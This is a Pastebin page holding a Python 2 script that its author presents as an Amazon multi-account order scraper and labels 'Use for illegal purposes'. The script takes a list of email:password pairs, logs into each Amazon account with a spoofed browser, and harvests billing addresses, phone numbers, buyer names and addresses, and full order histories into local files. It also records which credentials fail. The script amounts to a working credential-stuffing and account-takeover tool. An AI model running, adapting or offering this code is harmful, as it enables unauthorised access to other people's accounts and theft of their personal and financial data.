Advertisement
skip420

Amazon_Scraper1

Mar 1st, 2020
390
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 10.54 KB | None | 0 0
  1. #Note: This script includes auto bypass method for verfication account if it logins from a new area.
  2.  
  3. """
  4. Place user text file in same directory
  5. Usage: python amazon_scraper.py
  6. after run program input user text file which contain account like >> email:password
  7. enter output txt file name after execution
  8. """
  9. import mechanize
  10. from bs4 import BeautifulSoup
  11. from BeautifulSoup import BeautifulSoup
  12. from optparse import OptionParser
  13. from time import sleep
  14. import datetime
  15. import os
  16. import re
  17. import sys
  18.  
  19. order_no_id = open('order_ids.txt', 'w+')
  20. not_login = open('not_login.txt','w+')
  21. result = open ('result.txt', 'w+')
  22.  
  23. def banner():
  24.     print '======================================================'
  25.     print '|        Amazon Multi-Account Order Scraper   |'
  26.     print '======================================================'
  27.     print '| Purpose: To keep the client order history records  |'
  28.     print '| Date:    update this shit                          |' 
  29.     print '| Author:  Skip420                                   |'
  30.     print '| email:   irc_@freenode_#Shark                      |'
  31.     print '| Note:    Use for illegal purposes_                 |'
  32.     print '======================================================'
  33.  
  34. def account_info(address_book_info):
  35.     address_book = open('billing_info.txt', 'w+')
  36.     soup = BeautifulSoup(address_book_info)
  37.     print 'Getting Billing Informations...\r\n'
  38.     for order in soup.findAll('ul', {'class': 'displayAddressUL'}):
  39.         for items in order.findAll('li', {'class': 'displayAddressLI displayAddressAddressLine1'}):
  40.             for add1 in items:
  41.                 address_book.write(''.join(add1+'\r\n'))       
  42.         for items in order.findAll('li', {'class': 'displayAddressLI displayAddressAddressLine2'}):
  43.             for add2 in items:
  44.                 address_book.write(''.join(add2+'\r\n'))
  45.         for items in order.findAll('li', {'class': 'displayAddressLI displayAddressCityStateOrRegionPostalCode'}):
  46.             for s_r_p in items:
  47.                 address_book.write(''.join(s_r_p+'\r\n'))
  48.         for items in order.findAll('li', {'class': 'displayAddressLI displayAddressCountryName'}):
  49.             for c_n in items:
  50.                 address_book.write(''.join(c_n+'\r\n'))
  51.         for items in order.findAll('li', {'class': 'displayAddressLI displayAddressPhoneNumber'}):
  52.             for p_n in items:
  53.                 address_book.write(''.join(p_n+'\r\n'))
  54.     address_book.close()
  55.     result.write('\r\nBilling Information: \r\n')
  56.     result.write('===================\r\n')
  57.     cleaning_format('billing_info.txt')
  58.     result.write('-----------------------------------------------------\r\n')
  59.    
  60.    
  61. def orders_no_details_checking(html):
  62.     product_details = open('product_details.txt', 'w+')
  63.     buyer_details = open('buyer_details.txt', 'w+')
  64.     date_details = open ('date_details.txt', 'w+')
  65.     soup = BeautifulSoup(html)
  66.     print 'Geting Product Details...\r\n'
  67.     for order in soup.findAll('div', {'class': 'a-fixed-left-grid-col a-col-right'}):
  68.         for items in order.findAll('div', {'class': 'a-row'}):
  69.             for title in items.findAll('a', {'class': 'a-link-normal'}):
  70.                 for title_text in title:
  71.                     product_details.write(''.join(title_text))
  72.            
  73.             for description in items.findAll('span', {'class': 'a-size-small'}):
  74.                 for description_text in description:
  75.                     product_details.write(''.join(description_text))
  76.                    
  77.             for sold_by in items.findAll('span', {'class': 'a-size-small a-color-secondary'}):
  78.                 for sold_by_text in sold_by:
  79.                     product_details.write(''.join(sold_by_text))
  80.            
  81.             for price in items.findAll('span', {'class': 'a-size-small a-color-price'}):
  82.                 for price_text in price:
  83.                     product_details.write(''.join(price_text))
  84.            
  85.             for condition in items.findAll('span', {'class': 'a-color-secondary'}):
  86.                 for condition_text in condition:
  87.                     product_details.write(''.join(condition_text))
  88.    
  89.     print 'Getting Buyer Details....\r\n'
  90.     for order in soup.findAll('div', {'class': 'displayAddressDiv'}):
  91.         for items in order.findAll('ul', {'class': 'displayAddressUL'}):
  92.             for name in items.findAll('li', {'class': 'displayAddressLI displayAddressFullName'}):
  93.                 for name_text in name:
  94.                     buyer_details.write(''.join(name_text+'\r\n'))
  95.            
  96.             for address in items.findAll('li', {'class': 'displayAddressLI displayAddressAddressLine1'}):
  97.                 for address_text in address:
  98.                     buyer_details.write(''.join(address_text+'\r\n'))
  99.            
  100.             for city_state_postal_code in items.findAll('li', {'class': 'displayAddressLI displayAddressCityStateOrRegionPostalCode'}):
  101.                 for city_state_postal_code_text in city_state_postal_code:
  102.                     buyer_details.write(''.join(city_state_postal_code_text+'\r\n'))
  103.            
  104.             for country in items.findAll('li', {'class': 'displayAddressLI displayAddressCountryName'}):
  105.                 for country_text in country:
  106.                     buyer_details.write(''.join(country_text+'\r\n'))
  107.                    
  108.     print 'Getting date information...\r\n'
  109.     for order in soup.findAll('div', {'class': 'a-row a-spacing-none'}):
  110.         for items in order.findAll('span', {'class': 'order-date-invoice-item'}):
  111.             for date_text in items:
  112.                 date_details.write(''.join(str(date_text)))
  113.    
  114.     product_details.close()
  115.     buyer_details.close()
  116.     date_details.close()
  117.  
  118. def cleaning_format(txt_file):
  119.     with open(txt_file, 'r+') as fff:
  120.         for line in fff:
  121.             cleanedLine = line.strip()
  122.             if cleanedLine: #is not empty
  123.                 result.write(cleanedLine+'\r\n')
  124.     fff.close()
  125.    
  126. def Getting_orderID(htmls):
  127.     print 'Tracking Order No.s...\r\n'
  128.     soup = BeautifulSoup(htmls)
  129.     for order in soup.findAll("div", {"class": "a-row a-size-mini"}):
  130.         for item in order.findAll("span", {"class": "a-color-secondary value"}):
  131.             for idd in item:
  132.                 order_no_id.write(''.join(idd))
  133. ##########################Main_Code_Starting_from_here######################################
  134. if __name__ == '__main__':
  135.     banner()
  136.     sleep(1)
  137.     print '\r\n\r\n'
  138.     account_file = raw_input('Enter account file e.g. emails.txt: ')
  139.     try:
  140.         f1 = open(account_file).readlines()
  141.     except:
  142.         print '(!) Error in opening file. Please check file name with extension correctly.'
  143.         sys.exit(1)
  144.     x1 = str(len(f1))
  145.     print 'File Contains '+x1+' Entries.\r\n'
  146.     firstyear = raw_input('Enter Starting Year to start e.g. 2009: ')
  147.     with open(account_file, 'r+') as ff:
  148.         for words in ff:
  149.             print 'checking...'+words+'\r\n'
  150.             result.write('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n')
  151.             result.write('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n')
  152.             result.write(words+':::::::::::::::::::::::::: \r\n')
  153.             m = re.search(':', words)
  154.             usr = words[:m.start()]
  155.             pwd = words[m.end():]
  156.             pwd = pwd.strip()
  157.             br = mechanize.Browser()
  158.             br.set_handle_robots(False)
  159.             br.addheaders = [("User-agent", "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36"),('Accept', 'text/html, application/xml, */*')]
  160.             print 'Attempt to Logging in...'
  161.             resp = br.open("https://www.amazon.com/ap/signin?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&pageId=mas_dev_portal2&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.assoc_handle=mas_dev_portal&openid.return_to=https%3A%2F%2Fdeveloper.amazon.com%2Fap_login.html&language=en_US&openid.pape.max_auth_age=1")
  162.             resp.set_data(re.sub('<!DOCTYPE(.*)>', '', resp.get_data()))      
  163.             br.set_response(resp)
  164.             br.select_form(nr=0)
  165.             br["email"] = usr
  166.             br["password"] = pwd
  167.             logged_in = br.submit()
  168.             xx = logged_in.read()
  169.             error_str1 = "Important Message!"
  170.             error_str2 = "There was a problem with your request"
  171.             if error_str1 in xx:
  172.                 print error_str1
  173.                 print '\r\n'+'Please Check Account email and password...!\r\n'
  174.                 not_login.write(words+'\r\n')
  175.                 print 'The account which is not login will save in not_login.txt in same directory. \r\n'
  176.             if error_str2 in logged_in.read():
  177.                 print error_str2
  178.                 print '\r\n'+'Please Check Account email and password...!\r\n'
  179.                 not_login.write(words+'\r\n')
  180.                 print 'The account which is not login will save in not_login.txt in same directory. \r\n'
  181.             else:
  182.                 print "Successfully Login...!\r\n"
  183.                 sleep(2)
  184.                 billing_details = br.open("https://www.amazon.com/gp/css/account/address/view.html?ie=UTF8&ref_=ya_manage_address_book_t1")
  185.                 billing_details_info = billing_details.read()
  186.                 account_info(billing_details_info)
  187.                 sleep(2)
  188.                 for year in range(int(firstyear),  datetime.datetime.now().year):
  189.                     orders_html = br.open("https://www.amazon.com/gp/css/history/orders/view.html?orderFilter=year-%s&startAtIndex=1000" % year)
  190.                     print 'Getting Order No.s of '+str(year)+'\r\n'
  191.                     orders_details = orders_html.read()
  192.                     Getting_orderID(orders_details)
  193.                 order_no_id.close()
  194.                 orderss = open ('orders.txt', 'w+')
  195.                 with open('order_ids.txt', 'r+') as fff:
  196.                     for line in fff:
  197.                         cleanedLine = line.strip()
  198.                         if cleanedLine: #is not empty
  199.                             orderss.write(cleanedLine+'\r\n')
  200.                 orderss.close()
  201.                 fff.close()
  202.                 f11 = open('orders.txt').readlines()
  203.                 x1 = str(len(f11))
  204.                 print 'Total Orders is: '+x1+'\r\n'
  205.                 result.write('Total Orders: '+x1+' \r\n')
  206.                 print 'Getting Order Details....\r\n'
  207.                 ff22 = open('orders.txt', 'r+')
  208.                 sleep(2)
  209.                 for order_details in ff22:
  210.                     print 'Getting Details of Order No. '+str(order_details)+'\r\n'
  211.                     order_link = br.open("https://www.amazon.com/gp/your-account/order-details/ref=oh_aui_or_o00_?ie=UTF8&orderID=%s" % order_details)
  212.                     order_data = order_link.read()
  213.                     orders_no_details_checking(order_data)
  214.                     result.write('\r\nProduct Details: \r\n')
  215.                     result.write('================\r\n')
  216.                     cleaning_format('product_details.txt')
  217.                     result.write('-----------------------------------------------------\r\n')
  218.                     result.write('\r\nBuyer Details: \r\n')
  219.                     result.write('==============\r\n')
  220.                     cleaning_format('buyer_details.txt')
  221.                     result.write('-----------------------------------------------------\r\n')
  222.                     result.write('\r\nDate and Order No.: \r\n')
  223.                     result.write('===================\r\n')
  224.                     cleaning_format('date_details.txt')
  225.                     result.write('-----------------------------------------------------\r\n')
  226.                 ff22.close()
  227.            
  228.     print 'Order History of All accounts have been saved in result.txt file...!\r\n'
  229.     print 'Check not_login.txt for invalid login Attempts. \r\n'
  230.     try:
  231.         result.close()
  232.         order_no_id.close()
  233.         not_login.close()
  234.     except:
  235.         pass
  236.     try:
  237.         os.remove('billing_info.txt')
  238.         os.remove('product_details.txt')
  239.         os.remove('buyer_details.txt')
  240.         os.remove('date_details.txt')
  241.     except:
  242.         pass
  243.     try:
  244.         os.remove('order_ids.txt')
  245.         os.remove('orders.txt')
  246.     except:
  247.         pass
  248.     print './ done'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement